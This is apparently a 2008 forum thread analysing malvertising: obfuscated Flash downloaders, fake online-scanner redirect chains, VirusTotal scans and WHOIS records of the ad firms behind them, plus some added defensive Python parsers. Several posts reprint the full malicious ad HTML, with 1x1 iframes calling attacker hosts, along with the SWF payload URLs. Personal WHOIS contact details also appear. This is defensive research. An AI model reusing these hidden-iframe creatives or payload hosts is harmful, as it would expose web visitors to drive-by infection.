Full Version: Flash Mystery
Kimberly
<h4>
Updated Shockwave / Flash exploit
</h4>
Remember that I mentioned a different way to exploit redirects a couple of days ago, and the Shockwave exploit covered by Kaspersky?

Well, it all started last night when I got a popup for a fake online scanner without seeing a Flash malvertizement. So I had to dig a bit further, as usual. Going back to the site and stumbling on the same advertisement revealed something interesting in the network capture ... an encoded / obfuscated script, as seen below. It might not be the exact source of the fake scanner, as I didn't get redirected at the time of the write-up. It remains captivating though, as it covers yet another aspect of malicious ActionScript used in Flash content.
IPB Image
Since I'm curious, I feel the need to decode when possible, and what a nifty surprise it was when I discovered that the script tests which Flash version is installed and leads to a tiny swf file named july1st-firefox-intro.swf.
IPB Image
Inside july1st-firefox-intro.swf we discover 4 important strings:
CODE
String
value: /:$version
String
value: http://202.75.35.72/h/ff/
String
value: i.swf
String
value: _root
IPB Image
Seeing those strings, I realized I had stumbled on the exploit mentioned in the Kaspersky blog. Further analysis of the file shows that an evolution in obfuscation has taken place: the ActionScript code has been encrypted to better hide the code from researchers.
IPB Image
The initial swf file doesn't have any images either, as seen below: just 1 frame and the obfuscated ActionScript.
IPB Image
Upon "execution", the Flash Player version value is added to i.swf, being WIN 9,0,47,0 for me.
IPB Image
july1st-firefox-intro.swf is part of a bigger "hijack" by adverts. For more information on the main exe file, please refer to Trojan-Downloader.Win32.Firu.al. The Flash exploit has been added to the infection discovered a couple of days ago.
  1. Banner to be displayed: 247mediadirect.com/ad/images/468x60/40381.gif
  2. exe file: script at 247mediadirect.com/jh/f.php?id=9600 which leads to exe
  3. swf file: script at 202.75.35.72/z?i=1&n=6f743fe3724e01adbd202e04be8109e9&t=1215589262
CODE
<HTML><BODY><A HREF="http://247mediadirect.com/action/1/9600/98" TARGET="_blank"><IMG SRC="http://247mediadirect.com/ad/images/468x60/40381.gif"></A><iframe src="http://247mediadirect.com/jh/f.php?id=9600"  frameborder=0 marginheight=0 marginwidth=0 scrolling="no" allowTransparency="true" width=1 height=1></iframe></BODY></HTML><iframe src="http://202.75.35.72/z?i=1&n=6f743fe3724e01adbd202e04be8109e9&t=1215589262"  frameborder=0 marginheight=0 marginwidth=0 scrolling="no" allowTransparency="true" width=1 height=1></iframe>
IPB Image
<h4>
File details
</h4>
Filename: july1st-firefox-intro.swf

File size: 1332 bytes
MD5...: 47e99b0f5c97e6208d7bab6fa5be8991
SHA1..: 325de729cae0fed62fe47a78bcd9270c31308056
SHA256: cf98da052701fbcaa824f4b489379a6ec5c85237eebba8b8b1499b07ecb21681
PEiD..: -
QUOTE
File july1st-firefox-intro.swf received on 07.09.2008 01:55:09 (CET)
AhnLab-V3 2008.7.9.0 2008.07.08 -
AntiVir 7.8.0.64 2008.07.08 -
Authentium 5.1.0.4 2008.07.08 -
Avast 4.8.1195.0 2008.07.08 SWF:Downloader
AVG 7.5.0.516 2008.07.08 -
BitDefender 7.2 2008.07.08 -
CAT-QuickHeal 9.50 2008.07.08 -
ClamAV 0.93.1 2008.07.09 -
DrWeb 4.44.0.09170 2008.07.08 -
eSafe 7.0.17.0 2008.07.08 -
eTrust-Vet 31.6.5937 2008.07.08 -
Ewido 4.0 2008.07.08 -
F-Prot 4.4.4.56 2008.07.08 -
F-Secure 7.60.13501.0 2008.07.08 -
Fortinet 3.14.0.0 2008.07.08 -
GData 2.0.7306.1023 2008.07.08 SWF:Downloader
Ikarus T3.1.1.26.0 2008.07.09 -
Kaspersky 7.0.0.125 2008.07.09 -
McAfee 5334 2008.07.08 -
Microsoft 1.3704 2008.07.09 -
NOD32v2 3252 2008.07.08 -
Norman 5.80.02 2008.07.08 -
Panda 9.0.0.4 2008.07.08 -
Prevx1 V2 2008.07.09 -
Rising 20.52.12.00 2008.07.08 -
Sophos 4.31.0 2008.07.08 -
Sunbelt 3.1.1509.1 2008.07.04 -
Symantec 10 2008.07.09 -
TheHacker 6.2.96.374 2008.07.07 -
TrendMicro 8.700.0.1004 2008.07.08 -
VBA32 3.12.6.8 2008.07.08 -
VirusBuster 4.5.11.0 2008.07.08 -
Webwasher-Gateway 6.6.2 2008.07.08 -
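The creative quoted above hides its payload behind 1x1 iframes. As an added example (not code from the post), a Python audit of an ad creative's HTML that lists the frames a viewer never sees and notes whether they point away from the host serving the banner image; the sample is constructed from the quoted creative with the n= and t= tracking values redacted.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample modelled on the creative quoted above; the n= and t= values are redacted.
SAMPLE_CREATIVE = (
    '<HTML><BODY><A HREF="http://247mediadirect.com/action/1/9600/98" TARGET="_blank">'
    '<IMG SRC="http://247mediadirect.com/ad/images/468x60/40381.gif"></A>'
    '<iframe src="http://247mediadirect.com/jh/f.php?id=9600" frameborder=0 scrolling="no" width=1 height=1></iframe>'
    '</BODY></HTML>'
    '<iframe src="http://202.75.35.72/z?i=1&n=[removed]&t=[removed]" frameborder=0 width=1 height=1></iframe>'
)


class _CreativeParser(HTMLParser):
    """Collect the hosts serving the visible banner image and every iframe."""

    def __init__(self):
        super().__init__()
        self.image_hosts = set()
        self.iframes = []

    def handle_starttag(self, tag, attrs):
        a = {k.lower(): (v or "") for k, v in attrs}
        if tag == "img" and a.get("src"):
            self.image_hosts.add(urlparse(a["src"]).hostname or "")
        elif tag == "iframe" and a.get("src"):
            self.iframes.append((a["src"], a.get("width", ""), a.get("height", "")))


def _at_most_one_pixel(dim: str) -> bool:
    """True only when the dimension is explicit and 1px or less."""
    try:
        return int(dim.strip('"').rstrip("px")) <= 1
    except ValueError:
        return False


def audit_creative(html: str):
    """Return the iframes a viewer never sees (1x1 or smaller) with the host they
    load and whether that host differs from the one serving the banner image."""
    parser = _CreativeParser()
    parser.feed(html)
    findings = []
    for src, width, height in parser.iframes:
        if _at_most_one_pixel(width) and _at_most_one_pixel(height):
            host = urlparse(src).hostname or ""
            findings.append({"src": src, "host": host,
                             "third_party": host not in parser.image_hosts})
    return findings


if __name__ == "__main__":
    for finding in audit_creative(SAMPLE_CREATIVE):
        print(finding)
```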
Kimberly
<h4>
Updated Shockwave / Flash exploit
</h4>
Some fascinating background information about 247mediadirect.com & 202.75.35.72 is available on Sandi's blog.

<h4>
FIFTH malvertizement on iEUROP Group : ifrance - isuisse - ibelgique.com - iquebec.com - iespana.es - iitalia.com
</h4>
Incredible, isn't it? Another malvertizement featuring MediaMan is present:
  • on the main page of isuisse & iquebec
  • on the websites hosted on ibelgique & ifrance
How is this possible? I just can't believe it. I got hit by it just after the Forex AutoPilot malvert, which is still rotating too.

Screenshot in situ.
IPB Image
Banner.
image.ifrance.com/img/pub/atlantmedia/imediaman728x90.swf
IPB Image
IPB Image
IPB Image
Campaign.
statgroup.net/crossdomain.xml
statgroup.net/c/index.php?id=[removed]

profitabill.com/?cmpid=asbarrator
profitabill.com/?cmpid=asbarrator ... This is the same link as seen in the XM Radio malvertizement. Another interesting point: I think imediaman728x90.swf has been acquired very recently by iEUROP, the date being 9th of July 2008 - 6:12 PM.
IPB Image
Very often we notice that websites leave the advertiser's name as a folder name on their server. Here we see a mention of atlantmedia, so that deserves some digging.

<h4>
Atlant Media
</h4>
atlantmedia.net - 87.251.53.87

Website Title: Atlant Media
ICANN Registrar: TLDS, LLC DBA SRSPLUS
Created: 2008-04-14
Expires: 2009-04-14
Updated: 2008-05-16
Name Server: NS1.ATLANTMEDIA.NET (has 1 domains) - 208.79.82.50
Name Server: NS2.ATLANTMEDIA.NET - 208.79.82.66
Name Server: NS3.ATLANTMEDIA.NET - 77.73.98.2
Name Server: NS4.ATLANTMEDIA.NET - 77.73.98.4
Whois Server: whois.srsplus.com

Server Type: Apache/2.2.3 (Debian)
IP Address: 87.251.53.87
IP Location - Netherlands - Bit
Dedicated Hosting: atlantmedia.net is hosted on a dedicated server.

Registrant:
Samanta Lipton (mail@atlantmedia.net)
6 South Avenue
Kingston, NONE 0121
JM
876 920 8447

Domain Name: atlantmedia.net

Administrative, Technical, Billing Contact:
Samanta Lipton (mail@atlantmedia.net)
6 South Avenue
Kingston, NONE 0121
JM
876 920 8447

Domain Service Provider:
SoftSolutions Inc

Regular readers will already have noticed the NS servers, which are well known to us. The rest is self-explanatory.

Domains sharing nameservers.
No doubt, Atlant Media is yet another dodgy, bad advertising company. If you have been approached by people representing them, please check your creatives at Adopstools or contact us.

<h4>
Circulating malvertizements
</h4>
Courtesy of Sandi.

Classmates.
IPB Image
More info.
______________________________

Skype.
IPB Image
More info.
Kimberly
<h4>
Warning
</h4>
The bad guys are pulling off a new stunt when you are a victim of a redirect. Everyone has used copy and paste at least once in his / her life to pass links into the browser. Upon the redirect, one of the bad URLs is copied into your clipboard. So let's presume that just before it happened you had a website link in your clipboard; the redirect happens, you close all your windows with ALT+F4 and you decide to go back to the initial website using the paste function ... Wrong, because you now have a bad URL in your clipboard.
IPB Image
How to get rid of it quickly?
  1. Click Start > Run
  2. In the edit box, type clipbrd followed by Enter.
  3. The actual content of the clipboard will be displayed.
    IPB Image
  4. Click the Delete button and confirm with Yes.
Furthermore, I did notice that they had wiped isuisse.com (where the redirect occurred) from my Internet History list.
Kimberly
<h4>
Malvertizements - Another way of spreading
</h4>
Ever wondered why so many malicious banners are lying around on the Internet? Well, here is another method of spreading malvertizements. The banner is 1 year old (which gives an idea of how long these redirects have been going on already) ... it's the method used by those scammers that is disgusting.

You love Myspace / Xanga / Friendster / Hi5 stuff? Let's head towards www.funmunch.com then. See the Myspace Banners link?
IPB Image
When clicked, you are taken to the banner directory and wow a Flash file ...
IPB Image
Banner.
www.funmunch.com/banners/media.swf
IPB Image
Adopstools Test.
http://www.adopstools.com/index.asp?page=quicklink&id=2907h69B4n4rNAc1
Before using Flash banners on your MySpace profile (or elsewhere) check if they are clean at Adops Tools!!!
Kimberly
<h4>
Circulating malvertizements
</h4>
Courtesy of Sandi.

Dreammates.
IPB Image IPB Image
Note: rescaled for visibility - original size: 800x600

Campaign.
page2.googiesindication.com/c/index.php?id=[removed]
waytotheprofit.com/?cmpid=noanalysis&adid=intl
More info.
______________________________

Much Music.
IPB Image
Campaign.
statgroup.net/c/index.php?id=[removed]
waytotheprofit.com/?cmpid=ontitivate&adid=intl
More info.
Kimberly
<h4>
New kidz on the block
</h4>
Two new friends of our well-known adtds.trackads.net / adtds2.promoplexer.com domains are active.

internetsecuritydeluxe.com - 67.205.75.12
CODE
GET /in.cgi?22 HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
Accept-Language: en-us
~~~~~~~~~~~~~~~: ~~~~~ ~~~~~~~
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: adtds.trackads.net
Connection: Keep-Alive

HTTP/1.1 302 Found
Set-Cookie: SL_22_0000=_2_; domain=adtds2.promoplexer.com; path=/; expires=Tue, 15-Jul-2008 23:35:33 GMT
Location: http://internetsecuritydeluxe.com/scanner/scan.php?landid=2&depid=&cid=&parid=&bs=1
Content-type: text/html
Content-Length: 294
Date: Mon, 14 Jul 2008 23:35:33 GMT
Server: lighttpd/1.5.0

<html>
<head>
<meta http-equiv="REFRESH" content="1; URL='http://internetsecuritydeluxe.com/scanner/scan.php?landid=2&depid=&cid=&parid=&bs=1'">
</head>
<body>
document moved <a href="http://internetsecuritydeluxe.com/scanner/scan.php?landid=2&depid=&cid=&parid=&bs=1">here</a>
</body>
</html>
IPB Image
IPB Image
Website Title: .: InternetSecurityDeluxe - the best antispyware, antimalware ever :.

ICANN Registrar: ESTDOMAINS, INC.
Created: 2008-04-22
Expires: 2009-04-22
Updated: 2008-06-27
Name Server: NS.INTERNETSECURITYDELUXE.COM (has 1 domains)
Name Server: NS1.INTERNETSECURITYDELUXE.COM
Name Server: NS2.INTERNETSECURITYDELUXE.COM
Whois Server: whois.estdomains.com

Server Type: lighttpd/1.4.18
IP Address: 67.205.75.12
IP Location - Ukraine - Individual

Registration Service Provided By: ESTDOMAINS INC
Contact: +1.3027224217
Website: .www.estdomains.com

Domain Name: INTERNETSECURITYDELUXE.COM

Registrant:
Ind
Vasil pentykovich (leonardo126@gmail.com)
Ny tipa normalnij address
Shoblo
Other,20365
PR
Tel. +023.2569856
Fax. +023.5565599

Administrative Contact:
Ind
Vasil pentykovich (leonardo126@gmail.com)
Ny tipa normalnij address
Shoblo
Other,20365
PR
Tel. +023.2569856
Fax. +023.5565599

Technical Contact:
Ind
Vasil pentykovich (leonardo126@gmail.com)
Ny tipa normalnij address
Shoblo
Other,20365
PR
Tel. +023.2569856
Fax. +023.5565599

Billing Contact:
Ind
Vasil pentykovich (leonardo126@gmail.com)
Ny tipa normalnij address
Shoblo
Other,20365
PR
Tel. +023.2569856
Fax. +023.5565599
______________________________

scanner.vav-scan.com / *.vav-scan.com - 92.241.182.16
CODE
GET /in.cgi?2 HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
Accept-Language: en-us
~~~~~~~~~~~~~~~: ~~~~~ ~~~~~~~
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: adtds.trackads.net
Connection: Keep-Alive

HTTP/1.1 302 Found
Set-Cookie: SL_2_0000=_6_; domain=adtds2.promoplexer.com; path=/; expires=Tue, 15-Jul-2008 23:38:30 GMT
Set-Cookie: SL_12_0000=_3_; domain=adtds2.promoplexer.com; path=/; expires=Tue, 15-Jul-2008 23:38:30 GMT
Location: http://scanner.vav-scan.com/29/?advid=4925&ref=&p=1000000000
Content-type: text/html
Content-Length: 248
Date: Mon, 14 Jul 2008 23:38:30 GMT
Server: lighttpd/1.5.0

<html>
<head>
<meta http-equiv="REFRESH" content="1; URL='http://scanner.vav-scan.com/29/?advid=4925&ref=&p=1000000000'">
</head>
<body>
document moved <a href="http://scanner.vav-scan.com/29/?advid=4925&ref=&p=1000000000">here</a>
</body>
</html>
IPB Image
IPB Image
Website Title: Welcome to nginx!

ICANN Registrar: ESTDOMAINS, INC.
Created: 2008-05-28
Expires: 2009-05-28
Updated: 2008-07-14
Name Server: NS1.VAV-SCAN.COM (has 1 domains)
Name Server: NS2.VAV-SCAN.COM
Whois Server: whois.estdomains.com

IP Address: 92.241.182.16
IP Location - Russian Federation - Wahome Colocation

Registration Service Provided By: ESTDOMAINS INC
Contact: +1.3027224217
Website: .www.estdomains.com

Domain Name: VAV-SCAN.COM

Registrant:
Sawert Alliance ltd.
Leonid Sherbakov (selevitenterprises@gmail.com)
P.O. Box 3567, Road Town
Tortola
Not Applicable,N/A
VG
Tel. +7.9602578790

Administrative Contact:
Sawert Alliance ltd.
Leonid Sherbakov (selevitenterprises@gmail.com)
P.O. Box 3567, Road Town
Tortola
Not Applicable,N/A
VG
Tel. +7.9602578790

Technical Contact:
Sawert Alliance ltd.
Leonid Sherbakov (selevitenterprises@gmail.com)
P.O. Box 3567, Road Town
Tortola
Not Applicable,N/A
VG
Tel. +7.9602578790

Billing Contact:
Sawert Alliance ltd.
Leonid Sherbakov (selevitenterprises@gmail.com)
P.O. Box 3567, Road Town
Tortola
Not Applicable,N/A
VG
Tel. +7.9602578790

Websites.
  1. Vav-scan.com
  2. Vav-scanner.com
  3. Vavscan.com
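The adtds.trackads.net exchanges quoted above are typical TDS hops. As an added example, not code from the post or the forum, a Python parser that reduces such a capture to the fields that matter and raises the flags a defender cares about: a Location pointing off-host, a cookie planted for a domain other than the one answering, and a meta refresh that disagrees with the Location header. The sample is constructed by re-typing the first exchange above with the redacted (~~~) header dropped.

```python
import re
from urllib.parse import urlparse

# Constructed sample re-typed from the first exchange in this post, with the
# redacted (~~~) header dropped.
SAMPLE_CAPTURE = """GET /in.cgi?22 HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: adtds.trackads.net
Connection: Keep-Alive

HTTP/1.1 302 Found
Set-Cookie: SL_22_0000=_2_; domain=adtds2.promoplexer.com; path=/; expires=Tue, 15-Jul-2008 23:35:33 GMT
Location: http://internetsecuritydeluxe.com/scanner/scan.php?landid=2&depid=&cid=&parid=&bs=1
Content-type: text/html
Content-Length: 294
Server: lighttpd/1.5.0

<html>
<head>
<meta http-equiv="REFRESH" content="1; URL='http://internetsecuritydeluxe.com/scanner/scan.php?landid=2&depid=&cid=&parid=&bs=1'">
</head>
<body>
document moved <a href="http://internetsecuritydeluxe.com/scanner/scan.php?landid=2&depid=&cid=&parid=&bs=1">here</a>
</body>
</html>
"""

META_REFRESH = re.compile(r'http-equiv=["\']?refresh["\']?[^>]*?url=[\'"]?([^\'">\s]+)', re.I)
COOKIE_DOMAIN = re.compile(r'domain=([^;\s]+)', re.I)


def _split_message(block: str):
    """First line of an HTTP message plus (lower-cased name, value) header pairs."""
    lines = block.strip("\n").split("\n")
    headers = []
    for line in lines[1:]:
        if not line.strip():
            break
        name, _, value = line.partition(":")
        headers.append((name.strip().lower(), value.strip()))
    return lines[0], headers


def _values(headers, name):
    return [v for k, v in headers if k == name]


def parse_hop(capture: str) -> dict:
    """Reduce one request/response pair to the fields that describe a TDS hop."""
    request, _, response = capture.partition("\n\n")
    req_line, req_headers = _split_message(request)
    head, _, body = response.partition("\n\n")
    status_line, resp_headers = _split_message(head)
    refresh = META_REFRESH.search(body)
    return {
        "host": (_values(req_headers, "host") or [""])[0],
        "path": req_line.split()[1],
        "status": int(status_line.split()[1]),
        "location": (_values(resp_headers, "location") or [None])[0],
        "cookie_domains": [m.group(1).lstrip(".") for v in _values(resp_headers, "set-cookie")
                           for m in [COOKIE_DOMAIN.search(v)] if m],
        "meta_refresh": refresh.group(1) if refresh else None,
    }


def assess_hop(hop: dict):
    """Flags a defender would raise on the hop: off-host redirect, a cookie planted
    for a domain unrelated to the one answering, and body/header disagreement."""
    flags = []
    if hop["status"] in (301, 302, 303, 307) and hop["location"]:
        target = urlparse(hop["location"]).hostname or ""
        if target != hop["host"]:
            flags.append(f"302 sends the visitor off-host to {target}")
    for domain in hop["cookie_domains"]:
        if domain != hop["host"] and not hop["host"].endswith("." + domain):
            flags.append(f"cookie planted for unrelated domain {domain}")
    if hop["meta_refresh"] and hop["location"] and hop["meta_refresh"] != hop["location"]:
        flags.append("meta refresh target differs from Location header")
    return flags


if __name__ == "__main__":
    hop = parse_hop(SAMPLE_CAPTURE)
    print(hop["host"], "->", hop["location"])
    for flag in assess_hop(hop):
        print(" !", flag)
```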
Kimberly
<h4>
Circulating malvertizements
</h4>
Courtesy of Sandi.

Levi's.
IPB Image IPB Image
IPB Image
IPB Image
More info.
______________________________

Lexus - myownpoursuit.com.
IPB Image
More info.
______________________________

Lady SpeedStick.

The original malvertizement has already been replaced with a "cleaned" one. We have seen this happen before when hosted on their own "advert servers".
More info.
______________________________

XM Radio.

Another sample of XM Radio featuring the same campaign as the one seen on ifrance & co.
More info.
Kimberly
<h4>
Updated Shockwave / Flash exploit
</h4>
Another Flash file, smaller than the one mentioned here because it is packed this time (packer according to Kaspersky: Swf2Swc), and a new domain, 21centmedia.com, which is serving the same exploits and redirects as 247mediadirect.com. Ref.

Again we see a script to decode.
IPB Image
Decoded, we see again the same Flash test and a link to a tiny swf file named ff.swf.
IPB Image
Inside ff.swf we discover 4 important strings:
CODE
String
value: /:$version
String
value: http://209.47.164.209/h/ff/
String
value: swf
String
value: _root
The ActionScript code has been encrypted again, and ff.swf doesn't have any images either. Upon "execution", the Flash Player version value is added to the swf, being WIN 9,0,47,0 for me.
Whoops, sloppy coders: they kinda messed up this one, since the dot is missing between the filename and the file extension.
CODE
GET /h/ff/WIN%209,0,47,0swf HTTP/1.1
Accept: */*
Referer: [removed]
x-flash-version: 9,0,47,0
~~~~~~~~~~~~~~~: ~~~~~ ~~~~~~~
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: 209.47.164.209
Connection: Keep-Alive
Complete exploit:
CODE
<HTML><BODY><A HREF="http://21centmedia.com/route/1/5919/117" TARGET="_blank"><IMG SRC="http://21centmedia.com/banner/images/468x60/84489.jpg"></A><iframe src="http://21centmedia.com/xo/a.php?id=5919"  frameborder=0 marginheight=0 marginwidth=0 scrolling="no" allowTransparency="true" width=1 height=1></iframe></BODY></HTML><iframe src="http://209.47.164.209/z?i=1&n=4f6e8320e1ae5ca898cca282b69215e5&t=1216170914"  frameborder=0 marginheight=0 marginwidth=0 scrolling="no" allowTransparency="true" width=1 height=1></iframe>
<h4>
File details
</h4>
Filename: ff.swf

File size: 764 bytes
MD5...: d8081ca147f2369b0862db2341e8aa0d
SHA1..: 0c07fb184060123006a1edb4587cfd040abc2ab4
SHA256: 51de9f0d310f933f5d92466a5bd754b50effc4b39c38a506d3a7ea2c8f8a6fa9
PEiD..: -
QUOTE
File ff.swf received on 07.16.2008 03:36:03 (CET)
AhnLab-V3 2008.7.11.0 2008.07.15 -
AntiVir 7.8.0.68 2008.07.15 -
Authentium 5.1.0.4 2008.07.15 -
Avast 4.8.1195.0 2008.07.15 SWF:Downloader
AVG 7.5.0.516 2008.07.15 -
BitDefender 7.2 2008.07.16 -
CAT-QuickHeal 9.50 2008.07.15 -
ClamAV 0.93.1 2008.07.16 -
DrWeb 4.44.0.09170 2008.07.15 -
eSafe 7.0.17.0 2008.07.15 -
eTrust-Vet 31.6.5956 2008.07.15 -
Ewido 4.0 2008.07.15 -
F-Prot 4.4.4.56 2008.07.15 -
F-Secure 7.60.13501.0 2008.07.16 -
Fortinet 3.14.0.0 2008.07.16 -
GData 2.0.7306.1023 2008.07.16 SWF:Downloader
Ikarus T3.1.1.26.0 2008.07.16 Virus.SWF.Downloader
Kaspersky 7.0.0.125 2008.07.15 -
McAfee 5339 2008.07.15 -
Microsoft 1.3704 2008.07.15 -
NOD32v2 3270 2008.07.15 -
Norman 5.80.02 2008.07.15 -
Panda 9.0.0.4 2008.07.15 -
Prevx1 V2 2008.07.16 -
Rising 20.53.12.00 2008.07.15 -
Sophos 4.31.0 2008.07.16 -
Sunbelt 3.1.1536.1 2008.07.15 -
Symantec 10 2008.07.16 -
TheHacker 6.2.96.381 2008.07.16 -
TrendMicro 8.700.0.1004 2008.07.15 -
VBA32 3.12.8.0 2008.07.15 -
VirusBuster 4.5.11.0 2008.07.15 -
Webwasher-Gateway 6.6.2 2008.07.16 -
<h4>
21centmedia.com - 209.47.164.209
</h4>
Same registrant as 247mediadirect.com.

21centmedia.com - 209.47.164.209.

Website Title: None given.
ICANN Registrar: INTERCOSMOS MEDIA GROUP, INC. D/B/A DIRECTNIC.COM
Created: 2008-05-29
Expires: 2009-05-29
Updated: 2008-05-29
Name Server: NS0.DIRECTNIC.COM (has 354,650 domains)
Name Server: NS1.DIRECTNIC.COM
Whois Server: whois.directnic.com

IP Address: 209.47.164.209
IP Location - United States - Mci Communications Services Inc. D/b/a Verizon Business
Dedicated Hosting: 21centmedia.com is hosted on a dedicated server.

Registrant:
Media Hosting Ltd.
32 Jacka Blvd
St Kilda VIC, Melbourne 3182
AU
+61-03-9534-52830

Domain Name: 21CENTMEDIA.COM

Administrative Contact:
Pearson, Ross
32 Jacka Blvd
St Kilda VIC, Melbourne 3182
AU
+61-03-9534-52830

Technical Contact:
Pearson, Ross
32 Jacka Blvd
St Kilda VIC, Melbourne 3182
AU
+61-03-9534-52830

Record expires on 05-29-2009
Record created on 05-29-2008

Domain servers in listed order:
NS0.DIRECTNIC.COM 69.46.233.245
NS1.DIRECTNIC.COM 69.46.234.245
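The four strings found in july1st-firefox-intro.swf (earlier in this thread) and in ff.swf above are what an analyst looks for in these downloaders: a /:$version probe, a base URL to glue the version onto, and _root as the load target. As an added example that is not code from the thread, a Python script that walks the SWF tag stream, pulls strings out of DoAction constant pools and pushes, and applies that heuristic; the sample SWF is constructed by the script itself from the strings quoted above, not one of the files analysed here.

```python
import struct
import zlib

DO_ACTION = 12            # SWF tag code carrying AVM1 (ActionScript 2) bytecode
ACTION_CONSTANT_POOL = 0x88
ACTION_PUSH = 0x96


def swf_body(blob: bytes) -> bytes:
    """Strip the SWF header (signature, version, length, RECT, rate, count) and
    return the tag stream, inflating CWS (zlib-compressed) files first."""
    if blob[:3] == b"CWS":
        data = zlib.decompress(blob[8:])
    elif blob[:3] == b"FWS":
        data = blob[8:]
    else:
        raise ValueError("not a SWF file")
    nbits = data[0] >> 3                      # RECT: 5-bit field width, then 4 fields
    rect_len = (5 + 4 * nbits + 7) // 8
    return data[rect_len + 4:]                # skip frame rate (2) and frame count (2)


def iter_tags(body: bytes):
    """Yield (code, payload) for each tag, handling short and long tag headers."""
    pos = 0
    while pos + 2 <= len(body):
        hdr, = struct.unpack_from("<H", body, pos)
        code, length = hdr >> 6, hdr & 0x3F
        pos += 2
        if length == 0x3F:
            length, = struct.unpack_from("<I", body, pos)
            pos += 4
        yield code, body[pos:pos + length]
        pos += length
        if code == 0:                          # End tag
            return


def _push_strings(rec: bytes):
    """String operands of one ActionPush record; other operand types are skipped."""
    sizes = {1: 4, 2: 0, 3: 0, 4: 1, 5: 1, 6: 8, 7: 4, 8: 1, 9: 2}
    p = 0
    while p < len(rec):
        kind = rec[p]
        p += 1
        if kind == 0:                          # null-terminated string
            end = rec.index(b"\x00", p)
            yield rec[p:end].decode("latin-1")
            p = end + 1
        elif kind in sizes:
            p += sizes[kind]
        else:
            return


def action_strings(data: bytes):
    """Strings from ActionConstantPool and ActionPush records inside a DoAction tag."""
    out, pos = [], 0
    while pos < len(data):
        code = data[pos]
        pos += 1
        if code == 0:                          # ActionEnd
            break
        if code < 0x80:                        # single-byte action, no operands
            continue
        length, = struct.unpack_from("<H", data, pos)
        pos += 2
        rec = data[pos:pos + length]
        pos += length
        if code == ACTION_CONSTANT_POOL:
            count, = struct.unpack_from("<H", rec, 0)
            out.extend(s.decode("latin-1") for s in rec[2:].split(b"\x00")[:count])
        elif code == ACTION_PUSH:
            out.extend(_push_strings(rec))
    return out


def swf_strings(blob: bytes):
    return [s for code, payload in iter_tags(swf_body(blob))
            if code == DO_ACTION for s in action_strings(payload)]


def looks_like_version_downloader(strings) -> bool:
    """Heuristic for the pattern in the thread: a /:$version probe, a URL to
    glue the version onto, and _root as the loadMovie target."""
    has_url = any(s.startswith(("http://", "https://")) for s in strings)
    return "/:$version" in strings and "_root" in strings and has_url


def build_sample_swf(strings, compress=False) -> bytes:
    """Constructed test file: a minimal SWF whose single DoAction tag holds the
    given constant pool (not one of the samples from the thread)."""
    pool = struct.pack("<H", len(strings)) + b"".join(s.encode("latin-1") + b"\x00" for s in strings)
    actions = bytes([ACTION_CONSTANT_POOL]) + struct.pack("<H", len(pool)) + pool + b"\x00"
    tag = struct.pack("<HI", (DO_ACTION << 6) | 0x3F, len(actions)) + actions
    body = b"\x00" + struct.pack("<HH", 0x0C00, 1) + tag + struct.pack("<H", 0)  # RECT(0 bits), 12 fps, 1 frame, End
    header = (b"CWS" if compress else b"FWS") + bytes([8]) + struct.pack("<I", 8 + len(body))
    return header + (zlib.compress(body) if compress else body)


# Constructed sample carrying the four strings quoted above for ff.swf.
SAMPLE_SWF = build_sample_swf(["/:$version", "http://209.47.164.209/h/ff/", "swf", "_root"], compress=True)

if __name__ == "__main__":
    found = swf_strings(SAMPLE_SWF)
    print(found, looks_like_version_downloader(found))
```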
Kimberly
<h4>
Updated TravelWise banner
</h4>
Forwarded to us by a contact. The TravelWise malvertizement has been seen in the past in its 460x60 version on different occasions. Today a 728x90 version of this banner is circulating.

Banner.
IPB Image

Campaign.
stathisranch.com/c/index.php?id=[removed]
waytotheprofit.com/?cmpid=usboeotian&adid=intl
Kimberly
<h4>
softtraf.com
</h4>
adtds.trackads.net / adtds2.promoplexer.com have activated a new domain: softtraf.com
softtraf.com/go.php?id=[removed]
Depending on the id=, people will get redirected to different fake online scanners. At Domain Tools, softtraf.com is still listed under 92.241.182.14, but the website actually resolves to 91.208.0.244.
scanner.vav-scan.com has been moved into that range as well. We notice a couple of other domains that correspond to the id= redirects.

softtraf.com - 91.208.0.244

Registry Data
ICANN Registrar: ESTDOMAINS, INC.
Created: 2008-05-16
Expires: 2009-05-16
Updated: 2008-07-16
Registrar Status: ok
Name Server: ns1.softtraf.com 91.208.0.244
Name Server: ns2.softtraf.com 220.196.42.220
Whois Server: whois.estdomains.com

Whois Record
Domain Name: SOFTTRAF.COM

Registrant:
Sawert Alliance ltd.
Peltonen Martti (seodancer@gmail.com)
Jeledoroznaya str. 14
Volovoso
Leningradskaya oblast,188410
RU
Tel. +7.9218901266

Administrative Contact:
Sawert Alliance ltd.
Peltonen Martti (seodancer@gmail.com)
Jeledoroznaya str. 14
Volovoso
Leningradskaya oblast,188410
RU
Tel. +7.9218901266

Technical Contact:
Sawert Alliance ltd.
Peltonen Martti (seodancer@gmail.com)
Jeledoroznaya str. 14
Volovoso
Leningradskaya oblast,188410
RU
Tel. +7.9218901266

Billing Contact:
Sawert Alliance ltd.
Peltonen Martti (seodancer@gmail.com)
Jeledoroznaya str. 14
Volovoso
Leningradskaya oblast,188410
RU
Tel. +7.9218901266

Websites.
  1. Pornonod.com
  2. Softtraf.com
  3. Softtrafik.com
  4. Software-traff.com
  5. Software-traffic.com
  6. Softwaretraff.com
______________________________


Websites (According to Domain Tools).
______________________________

Information related to '91.208.0.0 - 91.208.0.255'

inetnum: 91.208.0.0 - 91.208.0.255
netname: STILLTRADE-NET
descr: Still Trade Ltd
country: RU
org: ORG-STIL1-RIPE
admin-c: PERE1-RIPE
tech-c: PERE1-RIPE
status: ASSIGNED PI
notify: lexa@wahome.ru
mnt-by: RIPE-NCC-HM-PI-MNT
mnt-by: STILLTRADE-MNT
mnt-lower: RIPE-NCC-HM-PI-MNT
mnt-routes: STILLTRADE-MNT
mnt-domains: STILLTRADE-MNT
